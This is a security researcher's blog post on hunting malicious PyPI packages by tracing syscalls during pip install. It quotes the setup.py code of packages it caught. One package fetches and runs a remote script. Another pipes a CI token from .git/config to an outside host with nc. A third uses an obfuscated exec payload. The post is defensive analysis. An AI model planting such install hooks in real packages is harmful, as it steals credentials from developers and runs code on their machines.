<!DOCTYPE html>
<html lang="en-us">

<head>

  <meta charset="utf-8" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge" />

  
  <meta property="og:title" content="Hunting for Malicious Packages on PyPI" />
  <meta property="twitter:title" content="Hunting for Malicious Packages on PyPI" />
  
  <meta property="og:site_name" content="Jordan Wright" />
  <meta property="og:url" content="https://jordan-wright.com/blog/post/2020-11-12-hunting-for-malicious-packages-on-pypi/" />
  <meta property="twitter:url" content="https://jordan-wright.com/blog/post/2020-11-12-hunting-for-malicious-packages-on-pypi/">


  
  <meta property="og:type" content="article" />

  <meta property="og:article:published_time" content="2020-11-12T06:00:00-05:00" />

  
  <meta property="og:article:tag" content="python" />
  
  <meta property="og:article:tag" content="malware" />
  
  <meta property="og:article:tag" content="supply_chain" />
  

  
  <meta property="og:description" content="I installed every package on PyPI to look for malicious content. This is what I found.">
  <meta property="twitter:description" content="I installed every package on PyPI to look for malicious content. This is what I found.">
  <meta name="description" content="I installed every package on PyPI to look for malicious content. This is what I found." />
  

  
  <meta property="og:image" content="https://jordan-wright.com/blog/images/headers/og/ossmalware.png">
  <meta property="twitter:image" content="https://jordan-wright.com/blog/images/headers/og/ossmalware.png">
  <meta property="twitter:card" content="summary_large_image">
  

  

  <title>
     Hunting for Malicious Packages on PyPI 
  </title>


  <meta name="HandheldFriendly" content="True" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />

  <link rel="shortcut icon" href="https://jordan-wright.com/blog/images/favicon.ico">
  <link rel="apple-touch-icon" href="https://jordan-wright.com/blog/images/apple-touch-icon.png" />

  <link rel="stylesheet" type="text/css" href="/blog/css/screen.css" />
  <link rel="stylesheet" type="text/css" href="/blog/css/highlight.css" />
  <link rel="stylesheet" type="text/css" href="https://jordan-wright.com/blog/css/nav.css" />
  <link rel="stylesheet" type="text/css"
    href="//fonts.googleapis.com/css?family=Lora:ital,wght@0,400;0,700;1,400;1,700|Open+Sans:700,400|Inconsolata" />


  
  
  <link href="https://jordan-wright.com/blog/index.xml" rel="alternate" type="application/rss+xml" title="Jordan Wright" />
  
  
  
  <meta name="generator" content="Hugo 0.40.3" />

  <link rel="canonical" href="https://jordan-wright.com/blog/post/2020-11-12-hunting-for-malicious-packages-on-pypi/" />

  
  <script>
    (function (i, s, o, g, r, a, m) {
      i['GoogleAnalyticsObject'] = r; i[r] = i[r] || function () {
        (i[r].q = i[r].q || []).push(arguments)
      }, i[r].l = 1 * new Date(); a = s.createElement(o),
        m = s.getElementsByTagName(o)[0]; a.async = 1; a.src = g; m.parentNode.insertBefore(a, m)
    })(window, document, 'script', '//www.google-analytics.com/analytics.js', 'ga');

    ga('create', 'UA-44718701-1', 'auto');
    ga('send', 'pageview');

  </script>
  

  
</head>

<body class="nav-closed">

  <div class="nav">
    <h3 class="nav-title">Menu</h3>
    <a href="#" class="nav-close">
        <span class="hidden">Close</span>
    </a>
    <ul>
        
        
        
            
            <li class="nav-opened" role="presentation">
            	<a href="https://jordan-wright.com/">Home</a>
            </li>
        
            
            <li class="nav-opened" role="presentation">
            	<a href="https://jordan-wright.com/contact/">Contact</a>
            </li>
        
            
            <li class="nav-opened" role="presentation">
            	<a href="https://jordan-wright.com/projects/">Projects</a>
            </li>
        
            
            <li class="nav-opened" role="presentation">
            	<a href="https://jordan-wright.com/blog/">Blog</a>
            </li>
        
            
            <li class="nav-opened" role="presentation">
            	<a href="https://raidersec.blogspot.com">Raidersec</a>
            </li>
        
    </ul>
    
    
    <a class="subscribe-button icon-feed" href="https://jordan-wright.com/blog/index.xml">Subscribe</a>
    
</div>
<span class="nav-cover"></span>


  <div class="site-wrapper">




<header class="main-header post-head no-cover">
  <nav class="main-nav clearfix">


  
      <a class="menu-button" href="#"><span class="burger">&#9776;</span><span class="word">Menu</span></a>
  
  </nav>
</header>



<main class="content" role="main">




  <article class="post post">

    <header class="post-header">
        <h1 class="post-title">Hunting for Malicious Packages on PyPI</h1>
        <small></small>

        <section class="post-meta">
        
          <time class="post-date" datetime="2020-11-12T06:00:00-05:00">
            Nov 12, 2020
          </time>
        
         
          <span class="post-tag small"><a href="https://jordan-wright.com/blog/tags/python/">#python</a></span>
         
          <span class="post-tag small"><a href="https://jordan-wright.com/blog/tags/malware/">#malware</a></span>
         
          <span class="post-tag small"><a href="https://jordan-wright.com/blog/tags/supply_chain/">#supply_chain</a></span>
         
        </section>
    </header>

    <section class="post-content">
      <p><img src="/blog/images/headers/svg/ossmalware.svg" alt="" class="pure-img" >

<br>
About a year ago, the Python Software Foundation <a href="https://discuss.python.org/t/what-methods-should-we-implement-to-detect-malicious-content/2240">opened a Request for Information (RFI)</a> to discuss how we could detect malicious packages being uploaded to PyPI. Whether it&rsquo;s <a href="https://blog.npmjs.org/post/141577284765/kik-left-pad-and-npm">taking over abandoned packages</a>, <a href="https://github.com/dateutil/dateutil/issues/984">typosquatting on popular libraries</a>, or <a href="https://github.com/ChALkeR/notes/blob/master/Gathering-weak-npm-credentials.md">hijacking packages using credential stuffing</a>, it&rsquo;s clear this is a real issue affecting nearly every package manager.</p>

<p></p>

<p>The truth is that package managers like PyPI are critical infrastructure that almost every company relies on. I could write for days on this topic, but I&rsquo;ll just let this xkcd suffice for now.</p>

<p><a href="https://xkcd.com/2347/"><img src="https://imgs.xkcd.com/comics/dependency.png" alt="" class="pure-img" >
</a></p>

<p>This is an area of interest for me, so I responded with <a href="https://gist.github.com/jordan-wright/dfe6236cb4d084aba282239fa9679bc8">my thoughts</a> on how we could approach this. While the entire post is well-cited, beautiful prose that you should go read, one thing stuck with me: considering what happens as soon as a package is installed.</p>

<p>While it might be necessary for some setup activities, things like establishing network connections or executing commands during the <code>pip install</code> process should always be viewed with a 🤨, since it doesn&rsquo;t give the developer much of a chance to inspect the code before bad things happen.</p>

<p>I wanted to explore this further, so in this post I&rsquo;m going to walk through how I installed and analyzed every package in PyPI looking for malicious activity.</p>

<h2 id="how-to-find-malicious-libraries">How to Find Malicious Libraries</h2>

<p>To run arbitrary commands during installation, authors typically add code to the <code>setup.py</code> file in their package. You can see some examples in <a href="https://github.com/rsc-dev/pypi_malware/tree/master/malware">this repository</a>.</p>

<p>At a high-level, there are two things you can do to find potentially malicious dependencies: you can look through the code for bad things (static analysis), or you can live dangerously and just install them to see what happens (dynamic analysis).</p>

<p>While static analysis is super interesting (heck, I <a href="https://duo.com/decipher/hunting-malicious-npm-packages">found malicious packages on npm</a> using artisanal <code>grep</code>ing), for this post I’ll focus on dynamic analysis. After all, I think it’s a bit more robust since you’re looking at what <em>actually</em> happens instead of just looking for bad things that could happen.</p>

<p>So what is it we’re actually looking for?</p>

<h3 id="how-important-things-get-done">How Important Things Get Done</h3>

<p>Generally, anytime something important happens it’s done by the kernel. Normal programs (like <code>pip</code>) that want to do important things through the kernel do so through the use of <em>syscalls</em>. Opening files, establishing network connections, and executing commands are all done using syscalls!</p>

<p>You can find more information in this comic from <a href="https://twitter.com/b0rk">Julia Evans</a>:</p>

<blockquote class="twitter-tweet"><p lang="en" dir="ltr">system calls <a href="https://t.co/hL91dqbFyq">pic.twitter.com/hL91dqbFyq</a></p>&mdash; 🔎Julia Evans🔍 (@b0rk) <a href="https://twitter.com/b0rk/status/989011990092963840?ref_src=twsrc%5Etfw">April 25, 2018</a></blockquote>
<script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>


<p>This means that if we can watch syscalls during the installation of a Python package, we can see if anything suspicious occurs. The benefit is that it doesn&rsquo;t matter how obfuscated the code is- we&rsquo;ll see what actually happens.</p>

<p>It&rsquo;s important to note that the idea of watching syscalls isn&rsquo;t something I came up with. Folks like <a href="https://twitter.com/adam_baldwin">Adam Baldwin</a> have been talking about this <a href="https://www.slideshare.net/evilpacket/hunting-for-malicious-modules-in-npm-nodesummit">since 2017</a>. And there was an <a href="https://arxiv.org/pdf/2002.01139.pdf">excellent paper</a> published by researchers from the Georgia Institute of Technology that took this same approach, among others. Honestly, most of this blog post is just trying to reproduce their work.</p>

<p>So we know we want to monitor syscalls - how exactly do we do that?</p>

<h3 id="watching-syscalls-with-sysdig">Watching Syscalls with Sysdig</h3>

<p>There are a number of tools designed to let you watch syscalls. For this project I used <a href="https://github.com/draios/sysdig">sysdig</a> since it provides both structured output and some really nice filtering capabilities.</p>

<p>To make this work, when starting the Docker container that installs the package, I also started a sysdig process that only monitors events from that container. I also filtered out network reads/writes that are going to/from <code>pypi.org</code> or <code>files.pythonhosted.com</code> since I didn&rsquo;t want to fill the logs with traffic related to package downloads.</p>

<p>With a way to capture syscalls, I had to solve another problem: how to get a list of all PyPI packages.</p>

<h2 id="getting-python-packages">Getting Python Packages</h2>

<p>Fortunately for us, PyPI has an API called the <a href="https://www.python.org/dev/peps/pep-0503/">“Simple API”</a> that can also be thought of as “a very big HTML page with a link to every package” since that’s what it is. It’s simple, clean, and better than any HTML I can probably write.</p>

<p>We can grab this page and parse out all the links using <code>pup</code>, giving us right around 268,000 packages:</p>
<div class="highlight"><pre class="chroma"><code class="language-text" data-lang="text">❯ curl https://pypi.org/simple/ | pup &#39;a text{}&#39; &gt; pypi_full.txt               

❯ wc -l pypi_full.txt 
  268038 pypi_full.txt</code></pre></div>
<p>For this experiment, I’ll only care about the latest release of each package. It’s possible that there’s malicious versions of packages buried in older releases, but the AWS bill isn’t going to pay itself.</p>

<p>I ended up with a pipeline that looked something like this:</p>

<p><object data="/blog/images/blog/ossmalware/architecture.svg" type="image/svg+xml"></object></p>

<p>In a nutshell, we&rsquo;re sending each package name to a set of EC2 instances (I&rsquo;d love to use Fargate or something in the future but I also don&rsquo;t know Fargate, so&hellip;) which fetches some metadata about the package from PyPI, then starts sysdig as well as a series of containers to <code>pip install</code> the package while syscalls and network traffic were being collected. Then, all of the data is shipped up to S3 for future-Jordan to worry about.</p>

<p>Here&rsquo;s what this process looks like:</p>

<p><object width="100%" data="/blog/images/blog/ossmalware/ec2_architecture.svg" type="image/svg+xml"></object></p>

<h2 id="the-results">The Results</h2>

<p>Once this was complete, I had about a terabyte of data sitting in an S3 bucket covering around 245,000 packages. A few packages didn&rsquo;t have a published version, and some had various processing errors but this felt like a great sample set to work from.</p>

<p>Now for the fun part: <strike>a crapton of grep</strike>  ✨ <strong>analysis</strong> ✨.</p>

<p>I merged the metata and the output, giving me a series of JSON files that looked like this:</p>
<div class="highlight"><pre class="chroma"><code class="language-json" data-lang="json"><span class="p">{</span>
    <span class="nt">&#34;metadata&#34;</span><span class="p">:</span> <span class="p">{},</span>
    <span class="nt">&#34;output&#34;</span><span class="p">:</span> <span class="p">{</span>
        <span class="nt">&#34;dns&#34;</span><span class="p">:</span> <span class="p">[],</span>         <span class="err">//</span> <span class="err">Any</span> <span class="err">DNS</span> <span class="err">requests</span> <span class="err">made</span>
        <span class="nt">&#34;files&#34;</span><span class="p">:</span> <span class="p">[],</span>       <span class="err">//</span> <span class="err">All</span> <span class="err">file</span> <span class="err">access</span> <span class="err">operations</span>
        <span class="nt">&#34;connections&#34;</span><span class="p">:</span> <span class="p">[],</span> <span class="err">//</span> <span class="err">TCP</span> <span class="err">connections</span> <span class="err">established</span>
        <span class="nt">&#34;commands&#34;</span><span class="p">:</span> <span class="p">[],</span>    <span class="err">//</span> <span class="err">Any</span> <span class="err">commands</span> <span class="err">executed</span>
    <span class="p">}</span>
<span class="p">}</span></code></pre></div>
<p>I then wrote a series of scripts to start aggregating the data, trying to get a sense of what&rsquo;s benign and what&rsquo;s malicious. Let&rsquo;s dig into some of the results.</p>

<h3 id="network-requests">Network Requests</h3>

<p>There are a number of reasons why a package would need to make a network connection during the installation process. They might need to download legitimate binary components or other resources, they might be a form of analytics, or they may be trying to exfiltrate data or credentials from the system.</p>

<p>The results found 460 packages making network connections to 109 unique hosts. Just like the paper above mentions, quite a few of these are the result of packages sharing a dependency that makes the network connection. It&rsquo;s possible to filter these out by mapping dependencies, but I haven&rsquo;t done that here.</p>

<p>For more information, <a href="https://gist.github.com/jordan-wright/c8b273372368ee639dec46b08a93bce1">here&rsquo;s</a> a breakdown of DNS requests seen during installation.</p>

<h3 id="command-execution">Command Execution</h3>

<p>Like network connections, there are legitimate reasons for packages to run system commands during installation. This could be to compile native binaries, setup the right environment, and more.</p>

<p>Looking across our sample set, 60,725 packages are found to be executing commands during installation. And just like network connections, we have to keep in mind that many of these will be the result of a downstream dependency being the package that runs the commands.</p>

<h2 id="interesting-packages">Interesting Packages</h2>

<p>Digging into the results, most network connections and commands appeared to be legitimate, as expected. But there were a few instances of odd behavior I wanted to call out as case studies to show how useful this type of analysis can be.</p>

<h3 id="i-am-malicious"><code>i-am-malicious</code></h3>

<p>One package called <code>i-am-malicious</code> appears to be a proof-of-concept of a malicious package. Here are the interesting details that give us an idea that the package is worth investigating (if the name weren&rsquo;t enough 😉):</p>
<div class="highlight"><pre class="chroma"><code class="language-json" data-lang="json"><span class="p">{</span>
  <span class="nt">&#34;dns&#34;</span><span class="p">:</span> <span class="p">[{</span>
          <span class="nt">&#34;name&#34;</span><span class="p">:</span> <span class="s2">&#34;gist.githubusercontent.com&#34;</span><span class="p">,</span>
          <span class="nt">&#34;addresses&#34;</span><span class="p">:</span> <span class="p">[</span>
            <span class="s2">&#34;199.232.64.133&#34;</span>
          <span class="p">]</span>
    <span class="p">}]</span>
  <span class="err">]</span><span class="p">,</span>
  <span class="nt">&#34;files&#34;</span><span class="p">:</span> <span class="p">[</span>
    <span class="err">...</span>
    <span class="p">{</span>
      <span class="nt">&#34;filename&#34;</span><span class="p">:</span> <span class="s2">&#34;/tmp/malicious.py&#34;</span><span class="p">,</span>
      <span class="nt">&#34;flag&#34;</span><span class="p">:</span> <span class="s2">&#34;O_RDONLY|O_CLOEXEC&#34;</span>
    <span class="p">},</span>
    <span class="err">...</span>
    <span class="p">{</span>
      <span class="nt">&#34;filename&#34;</span><span class="p">:</span> <span class="s2">&#34;/tmp/malicious-was-here&#34;</span><span class="p">,</span>
      <span class="nt">&#34;flag&#34;</span><span class="p">:</span> <span class="s2">&#34;O_TRUNC|O_CREAT|O_WRONLY|O_CLOEXEC&#34;</span>
    <span class="p">},</span>
    <span class="err">...</span>
  <span class="p">],</span>
  <span class="nt">&#34;commands&#34;</span><span class="p">:</span> <span class="p">[</span>
    <span class="s2">&#34;python /tmp/malicious.py&#34;</span>
  <span class="p">]</span>
<span class="p">}</span></code></pre></div>
<p>We can already get some sense of what&rsquo;s happening here. We see a connection made to <code>gist.github.com</code>, a Python file being executed, and a file named <code>/tmp/malicious-was-here</code> being created. Sure enough, that&rsquo;s exactly what&rsquo;s happening in the <code>setup.py</code>:</p>
<div class="highlight"><pre class="chroma"><code class="language-python" data-lang="python"><span class="kn">from</span> <span class="nn">urllib.request</span> <span class="kn">import</span> <span class="n">urlopen</span>

<span class="n">handler</span> <span class="o">=</span> <span class="n">urlopen</span><span class="p">(</span><span class="s2">&#34;https://gist.githubusercontent.com/moser/49e6c40421a9c16a114bed73c51d899d/raw/fcdff7e08f5234a726865bb3e02a3cc473cecda7/malicious.py&#34;</span><span class="p">)</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s2">&#34;/tmp/malicious.py&#34;</span><span class="p">,</span> <span class="s2">&#34;wb&#34;</span><span class="p">)</span> <span class="k">as</span> <span class="n">fp</span><span class="p">:</span>
    <span class="n">fp</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">handler</span><span class="o">.</span><span class="n">read</span><span class="p">())</span>

<span class="kn">import</span> <span class="nn">subprocess</span>

<span class="n">subprocess</span><span class="o">.</span><span class="n">call</span><span class="p">([</span><span class="s2">&#34;python&#34;</span><span class="p">,</span> <span class="s2">&#34;/tmp/malicious.py&#34;</span><span class="p">])</span></code></pre></div>
<p>The <a href="https://gist.githubusercontent.com/moser/49e6c40421a9c16a114bed73c51d899d/raw/fcdff7e08f5234a726865bb3e02a3cc473cecda7/malicious.py"><code>malicious.py</code></a> in question simply adds an &ldquo;I was here&rdquo; type message to <code>/tmp/malicious-was-here</code>, suggesting this is indeed a proof-of concept.</p>

<h3 id="maliciouspackage"><code>maliciouspackage</code></h3>

<p>Another self-proclaimed malicious package creatively named <code>maliciouspackage</code> is a bit more nefarious. Here&rsquo;s the relevant output:</p>
<div class="highlight"><pre class="chroma"><code class="language-json" data-lang="json"><span class="p">{</span>
  <span class="nt">&#34;dns&#34;</span><span class="p">:</span> <span class="p">[{</span>
      <span class="nt">&#34;name&#34;</span><span class="p">:</span> <span class="s2">&#34;laforge.xyz&#34;</span><span class="p">,</span>
      <span class="nt">&#34;addresses&#34;</span><span class="p">:</span> <span class="p">[</span>
        <span class="s2">&#34;34.82.112.63&#34;</span>
      <span class="p">]</span>
  <span class="p">}],</span>
  <span class="nt">&#34;files&#34;</span><span class="p">:</span> <span class="p">[</span>
    <span class="p">{</span>
      <span class="nt">&#34;filename&#34;</span><span class="p">:</span> <span class="s2">&#34;/app/.git/config&#34;</span><span class="p">,</span>
      <span class="nt">&#34;flag&#34;</span><span class="p">:</span> <span class="s2">&#34;O_RDONLY&#34;</span>
    <span class="p">},</span>
  <span class="p">],</span>
  <span class="nt">&#34;commands&#34;</span><span class="p">:</span> <span class="p">[</span>
    <span class="s2">&#34;sh -c apt install -y socat&#34;</span><span class="p">,</span>
    <span class="s2">&#34;sh -c grep ci-token /app/.git/config | nc laforge.xyz 5566&#34;</span><span class="p">,</span>
    <span class="s2">&#34;grep ci-token /app/.git/config&#34;</span><span class="p">,</span>
    <span class="s2">&#34;nc laforge.xyz 5566&#34;</span>
  <span class="p">]</span>
<span class="p">}</span></code></pre></div>
<p>As before, our output gives us a decent idea of what&rsquo;s going on. In this case, the package appears to extract out a token from the <code>.git/config</code> file and upload it to <code>laforge.xyz</code>. Looking through the <code>setup.py</code>, we see that&rsquo;s exactly what&rsquo;s happening:</p>
<div class="highlight"><pre class="chroma"><code class="language-python" data-lang="python"><span class="o">...</span>
<span class="kn">import</span> <span class="nn">os</span>
<span class="n">os</span><span class="o">.</span><span class="n">system</span><span class="p">(</span><span class="s1">&#39;apt install -y socat&#39;</span><span class="p">)</span>
<span class="n">os</span><span class="o">.</span><span class="n">system</span><span class="p">(</span><span class="s1">&#39;grep ci-token /app/.git/config | nc laforge.xyz 5566&#39;</span><span class="p">)</span></code></pre></div>
<h3 id="easyioctl"><code>easyIoCtl</code></h3>

<p>The package <code>easyIoCtl</code> is an interesting one. It claims to give &ldquo;abstractions away from boring IO operations&rdquo; but we see the following commands being executed:</p>
<div class="highlight"><pre class="chroma"><code class="language-bash" data-lang="bash"><span class="o">[</span>
  <span class="s2">&#34;sh -c touch /tmp/testing123&#34;</span>,
  <span class="s2">&#34;touch /tmp/testing123&#34;</span>
<span class="o">]</span></code></pre></div>
<p>Suspicious, but not actively harmful. However, this is a <em>perfect</em> example showing the power of tracing syscalls. Here is the relevant code in the project&rsquo;s <code>setup.py</code>:</p>
<div class="highlight"><pre class="chroma"><code class="language-python" data-lang="python"><span class="k">class</span> <span class="nc">MyInstall</span><span class="p">():</span>
    <span class="k">def</span> <span class="nf">run</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="n">control_flow_guard_controls</span> <span class="o">=</span> <span class="s1">&#39;l0nE@`eBYNQ)Wg+-,ka}fM(=2v4AVp![dR/</span><span class="se">\\</span><span class="s1">ZDF9s</span><span class="se">\x0c</span><span class="s1">~PO%yc X3UK:.w</span><span class="se">\x0b</span><span class="s1">L$Ijq&lt;&amp;</span><span class="se">\r</span><span class="s1">6*?</span><span class="se">\&#39;</span><span class="s1">1&gt;mSz_^C</span><span class="se">\t</span><span class="s1">o#hiJtG5xb8|;</span><span class="se">\n</span><span class="s1">7T{uH]&#34;r&#39;</span>
        <span class="n">control_flow_guard_mappers</span> <span class="o">=</span> <span class="p">[</span><span class="mi">81</span><span class="p">,</span> <span class="mi">71</span><span class="p">,</span> <span class="mi">29</span><span class="p">,</span> <span class="mi">78</span><span class="p">,</span> <span class="mi">99</span><span class="p">,</span> <span class="mi">83</span><span class="p">,</span> <span class="mi">48</span><span class="p">,</span> <span class="mi">78</span><span class="p">,</span> <span class="mi">40</span><span class="p">,</span> <span class="mi">90</span><span class="p">,</span> <span class="mi">78</span><span class="p">,</span> <span class="mi">40</span><span class="p">,</span> <span class="mi">54</span><span class="p">,</span> <span class="mi">40</span><span class="p">,</span> <span class="mi">46</span><span class="p">,</span> <span class="mi">40</span><span class="p">,</span> <span class="mi">83</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">71</span><span class="p">,</span> <span class="mi">22</span><span class="p">,</span> <span class="mi">68</span><span class="p">,</span> <span class="mi">83</span><span class="p">,</span> <span class="mi">78</span><span class="p">,</span> <span class="mi">95</span><span class="p">,</span> <span class="mi">47</span><span class="p">,</span> <span class="mi">80</span><span class="p">,</span> <span class="mi">48</span><span class="p">,</span> <span class="mi">34</span><span class="p">,</span> <span class="mi">83</span><span class="p">,</span> <span class="mi">71</span><span class="p">,</span> <span class="mi">29</span><span class="p">,</span> <span class="mi">34</span><span class="p">,</span> <span class="mi">83</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">40</span><span class="p">,</span> <span class="mi">83</span><span class="p">,</span> <span class="mi">81</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">13</span><span class="p">,</span> <span class="mi">69</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="mi">50</span><span class="p">,</span> <span class="mi">68</span><span class="p">,</span> <span class="mi">11</span><span class="p">]</span>
        <span class="n">control_flow_guard_init</span> <span class="o">=</span> <span class="s2">&#34;&#34;</span>
        <span class="k">for</span> <span class="n">controL_flow_code</span> <span class="ow">in</span> <span class="n">control_flow_guard_mappers</span><span class="p">:</span>
            <span class="n">control_flow_guard_init</span> <span class="o">=</span> <span class="n">control_flow_guard_init</span> <span class="o">+</span> <span class="n">control_flow_guard_controls</span><span class="p">[</span><span class="n">controL_flow_code</span><span class="p">]</span>
        <span class="k">exec</span><span class="p">(</span><span class="n">control_flow_guard_init</span><span class="p">)</span></code></pre></div>
<p>With so much obfuscation, it&rsquo;s hard to tell what&rsquo;s going on. Traditional static analysis might catch the call to <code>exec</code>, but that&rsquo;s about it.</p>

<p>To see what this is doing, we can replace the <code>exec</code> with a <code>print</code>, resulting in:</p>
<div class="highlight"><pre class="chroma"><code class="language-python" data-lang="python"><span class="kn">import</span> <span class="nn">os</span><span class="p">;</span><span class="n">os</span><span class="o">.</span><span class="n">system</span><span class="p">(</span><span class="s1">&#39;touch /tmp/testing123&#39;</span><span class="p">)</span></code></pre></div>
<p>This is exactly the command we recorded, showing that even code obfuscation won&rsquo;t affect our results since we&rsquo;re doing our monitoring at the syscall level.</p>

<h2 id="what-happens-when-we-find-a-malicious-package">What Happens When we Find a Malicious Package?</h2>

<p>It&rsquo;s worth briefly discussing what we can do when we find a malicious package. The first thing to do would be to alert the PyPI volunteers so they can take down the package. This can be done by contacting security@python.org.<sup><a href="#footnote-1">1</a></sup></p>

<p>After that, we can look at how many times the package has been downloaded using <a href="https://packaging.python.org/guides/analyzing-pypi-package-downloads/#counting-package-downloads">the PyPI public dataset</a> on BigQuery.</p>

<p>Here&rsquo;s an example query to find how many times <code>maliciouspackage</code> has been installed in the last 30 days:</p>
<div class="highlight"><pre class="chroma"><code class="language-sql" data-lang="sql"><span class="o">#</span><span class="n">standardSQL</span>
<span class="k">SELECT</span> <span class="k">COUNT</span><span class="p">(</span><span class="o">*</span><span class="p">)</span> <span class="k">AS</span> <span class="n">num_downloads</span>
<span class="k">FROM</span> <span class="o">`</span><span class="n">the</span><span class="o">-</span><span class="n">psf</span><span class="p">.</span><span class="n">pypi</span><span class="p">.</span><span class="n">file_downloads</span><span class="o">`</span>
<span class="k">WHERE</span> <span class="n">file</span><span class="p">.</span><span class="n">project</span> <span class="o">=</span> <span class="s1">&#39;maliciouspackage&#39;</span>
  <span class="c1">-- Only query the last 30 days of history
</span><span class="c1"></span>  <span class="k">AND</span> <span class="nb">DATE</span><span class="p">(</span><span class="k">timestamp</span><span class="p">)</span>
    <span class="k">BETWEEN</span> <span class="n">DATE_SUB</span><span class="p">(</span><span class="k">CURRENT_DATE</span><span class="p">(),</span> <span class="nb">INTERVAL</span> <span class="mi">30</span> <span class="k">DAY</span><span class="p">)</span>
    <span class="k">AND</span> <span class="k">CURRENT_DATE</span><span class="p">())</span></code></pre></div>
<p>Running this query shows that it&rsquo;s been downloaded over 400 times:</p>

<p><img src="/blog/images/blog/ossmalware/maliciouspackage_downloads.png" alt="maliciouspackage downloads" /></p>

<h2 id="moving-forward">Moving Forward</h2>

<p>This first pass was just taking an initial look at PyPI as a whole. Looking through the data, I didn&rsquo;t find any packages doing significantly harmful activity that didn&rsquo;t also have &ldquo;malicious&rdquo; somewhere in the name, which was good! But it&rsquo;s always possible I missed something, or that it would happen in the future. If you&rsquo;re interested in digging into the data, you can find it <a href="https://drive.google.com/file/d/1ukZK5-JEQrmo_t15aq_4z-jlkjNqbec8/view?usp=sharing">here</a>.</p>

<p>Moving forward, I&rsquo;m setting up a Lambda function to fetch the latest package changes using PyPI&rsquo;s <a href="https://pypi.org/rss/updates.xml">RSS feed.</a>. Every updated package will go through the same processing and send an alert if suspicious activity is detected.</p>

<p>I still don&rsquo;t like that it&rsquo;s possible to run arbitary commands on a user&rsquo;s system just by them <code>pip install</code>ing a package. I get that the majority of use cases are benign, but it opens up risk that must be considered. Hopefully by increasingly monitoring various package managers we can identify signs of malicious activity before it has a significant impact.</p>

<p>And this isn&rsquo;t unique to PyPI. After this, I&rsquo;m hoping to run the same analysis on RubyGems, npm, and others- much like the researchers I mentiond earlier. In the meantime, you can find all the code used to run the experiment <a href="https://github.com/jordan-wright/ossmalware">here</a> and, as always, let me know if you have any questions!</p>

<p>- Jordan (<a href="https://twitter.com/jw_sec">@jw_sec</a>)</p>

<hr>

<p><small><span id="footnote-1"><a href="#footnote-1">1.</a> I sent an email with the packages I mentioned here and will update the post when I hear back (note: it&rsquo;s only been a couple of days, so this is expected). Since these were essentially harmless or clearly proof-of-concept packages, I didn&rsquo;t think there was risk in releasing the blog post.</span></small></p>
    </section>


  <footer class="post-footer">


    
    <figure class="author-image">
        <a class="img" href="https://jordan-wright.com/blog/" style="background-image: url(https://jordan-wright.com/blog/images/jordan-profile.jpg)"><span class="hidden">Jordan Wright's Picture</span></a>
    </figure>
    

    





<section class="author">
  <h4><a href="https://jordan-wright.com/blog/">Jordan Wright</a></h4>
  
  <p>Security Researcher, Open-Source Developer.</p>
  
  <div class="author-meta">
    <span class="author-location icon-location">San Antonio, Texas</span>
    
  </div>
</section>



    
<section class="share">
  <h4>Share this post</h4>
  <a class="icon-twitter" style="font-size: 1.4em" href="https://twitter.com/share?text=Hunting%20for%20Malicious%20Packages%20on%20PyPI&nbsp;-&nbsp;Jordan%20Wright&amp;url=https%3a%2f%2fjordan-wright.com%2fblog%2fpost%2f2020-11-12-hunting-for-malicious-packages-on-pypi%2f"
      onclick="window.open(this.href, 'twitter-share', 'width=550,height=235');return false;">
      <span class="hidden">Twitter</span>
  </a>
  <a class="icon-facebook" style="font-size: 1.4em" href="https://www.facebook.com/sharer/sharer.php?u=https%3a%2f%2fjordan-wright.com%2fblog%2fpost%2f2020-11-12-hunting-for-malicious-packages-on-pypi%2f"
      onclick="window.open(this.href, 'facebook-share','width=580,height=296');return false;">
      <span class="hidden">Facebook</span>
  </a>
  <a class="icon-google-plus" style="font-size: 1.4em" href="https://plus.google.com/share?url=https%3a%2f%2fjordan-wright.com%2fblog%2fpost%2f2020-11-12-hunting-for-malicious-packages-on-pypi%2f"
     onclick="window.open(this.href, 'google-plus-share', 'width=490,height=530');return false;">
      <span class="hidden">Google+</span>
  </a>
</section>



    




  </footer>
</article>

</main>
    </div>
    <script type="text/javascript" src="https://jordan-wright.com/blog/js/jquery.js"></script>
    <script type="text/javascript" src="https://jordan-wright.com/blog/js/jquery.fitvids.js"></script>
    <script type="text/javascript" src="https://jordan-wright.com/blog/js/index.js"></script>
    
</body>
</html>

